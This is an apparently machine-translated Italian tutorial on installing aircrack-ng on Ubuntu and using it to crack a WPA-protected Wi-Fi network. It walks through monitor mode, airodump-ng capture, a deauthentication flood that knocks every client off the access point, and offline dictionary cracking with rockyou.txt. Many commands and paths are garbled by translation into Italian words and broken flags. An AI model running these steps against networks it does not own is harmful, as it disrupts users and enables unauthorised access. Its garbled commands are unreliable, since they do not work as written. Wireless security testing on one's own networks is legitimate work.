Installa Aircrack su Ubuntu

Install Aircrack Ng Ubuntu



Aircrack-ng è un'intera suite di strumenti per il controllo della sicurezza wireless. Può essere utilizzato per monitorare, testare, violare o attaccare protocolli di sicurezza wireless come WEP, WPA, WPA2. Aircrack-ng è basato sulla riga di comando ed è disponibile per Windows e Mac OS e altri sistemi operativi basati su Unix. La suite Aircrack-ng contiene molti strumenti utilizzati per vari scopi, ma qui esamineremo solo alcuni strumenti importanti che vengono utilizzati più spesso nei test di sicurezza wireless.

Airmon-ng







Airmon-ng viene utilizzato per gestire le modalità della scheda wireless e per eliminare i processi non necessari durante l'utilizzo di aircrack-ng. Per annusare una connessione wireless, è necessario modificare la scheda wireless dalla modalità gestita alla modalità monitor e airmon-ng viene utilizzato a tale scopo.



Airodump-ng



Airodump-ng è uno sniffer wireless in grado di acquisire dati wireless da uno o più Access Point wireless. Viene utilizzato per analizzare i punti di accesso vicini e per acquisire le strette di mano.





Aireplay-ng

Aireplay-ng viene utilizzato per attacchi di replay e come iniettore di pacchetti. Può essere la de-autenticazione degli utenti dai loro AP per acquisire le strette di mano.



Airdecap-ng

Airdecap-ng viene utilizzato per decifrare WEP crittografati, pacchetti wireless WPA/WPA2 con chiave nota.

Aircrack-ng

Aircrack-ng viene utilizzato per attaccare i protocolli wireless WPA/WEP per trovare la chiave.

Aircrack-ng è facile da installare in Ubuntu usando APT. Basta digitare il seguente comando e questo installerà tutti gli strumenti disponibili nella suite Aircrack-ng.

sudo apt-get update
sudo apt-get install -eaircrack-ng

utilizzo

In questo articolo, daremo una rapida occhiata a come utilizzare aircrack-ng per craccare una rete wireless crittografata (TR1CKST3R in questo esempio) per trovare la password.

Prima di tutto, elenca tutte le schede wireless disponibili collegate al tuo PC usando il comando 'iwconfig'.

Useremo la scheda wireless denominata 'wlxc83a35cb4546' per questo tutorial (questo potrebbe essere diverso nel tuo caso). Ora, uccidi tutti i processi in esecuzione sulla scheda wireless usando airmon-ng.

[e-mail protetta] :~$sudocontrollo airmon-nguccisione
Avvia la modalità Monitor su 'wlxc83a35cb4546' digitando
[e-mail protetta] :~$sudoairmon-ng inizia wlxc83a35cb4546

Ora, airmon-ng ha avviato la modalità Monitor sulla scheda wireless, apparirà come un nome diverso 'wlan0mon'. Esegui di nuovo 'iwconfig' per elencare i dettagli wireless.

Quindi, usa airodump-ng per vedere i punti di accesso wireless nelle vicinanze e le loro proprietà.

[e-mail protetta] :~$sudoairodump-ng wlan0mon

È possibile restringere la ricerca utilizzando i filtri MAC (–bssid) e canale (-c). Per acquisire l'handshake (Handshake contiene una password crittografata), dobbiamo salvare i nostri pacchetti da qualche parte utilizzando l'opzione –write. Tipo,

[e-mail protetta] :~$sudoairodump-ng--bss6C:B7:49: FC:62: MI4
-C undiciwlan0mon--Scrivi /tmp/stretta di mano.cap

--bss: Indirizzo MAC del punto di accesso

-C: canale del punto di accesso[1-13]

--Scrivi: Memorizza i pacchetti catturati in una posizione definita

Ora, abbiamo bisogno di de-autenticare ogni dispositivo da questo punto di accesso usando l'utility Aireplay-ng. Scrivi

[e-mail protetta] :~$sudoaireplay-ng-0 100 -a [MAC_ADD]wlan0mon

-a : specifica i punti di accesso MAC per Aireplay-ng

-0 : Specifica il numero di pacchetti deauth da inviare

Dopo un po', tutti i dispositivi verranno disconnessi da quell'Access Point, quando proveranno a riconnettersi, l'esecuzione di airodump-ng catturerà l'handshake. Apparirà nella parte superiore dell'esecuzione di airodump-ng.

Handshake è memorizzato nella directory '/tmp/' e contiene password crittografate che possono essere forzate offline utilizzando un dizionario. Per decifrare la password, utilizzeremo Aircrack-ng. Tipo

[e-mail protetta] :~$sudoaircrack-ng/tmp/stretta di mano.cap-01.cap-in
/usr/Condividere/elenchi di parole/rockyou.txt
-in: Specifica la posizione del dizionario

Aircrack-ng passerà attraverso l'elenco delle password e, se trovato, visualizzerà la password utilizzata come chiave.

In questo caso, aircrack-ng ha trovato la password utilizzata '123456789'.

Ora, interrompi la modalità Monitor sulla scheda wireless e riavvia il gestore di rete.

[e-mail protetta] :~$sudoairmon-ng stop wlan0mon
[e-mail protetta] :~$sudoriavvio del gestore di rete del servizio

Conclusione

Aircrack-ng può essere utilizzato per controllare la sicurezza wireless o per decifrare password dimenticate. Ci sono altri strumenti simili disponibili per questo scopo come Kismet, ma aircrack-ng è meglio conosciuto per un buon supporto, versatilità e un'ampia gamma di strumenti. Ha un'interfaccia a riga di comando facile da usare che può essere facilmente automatizzata utilizzando qualsiasi linguaggio di scripting come Python.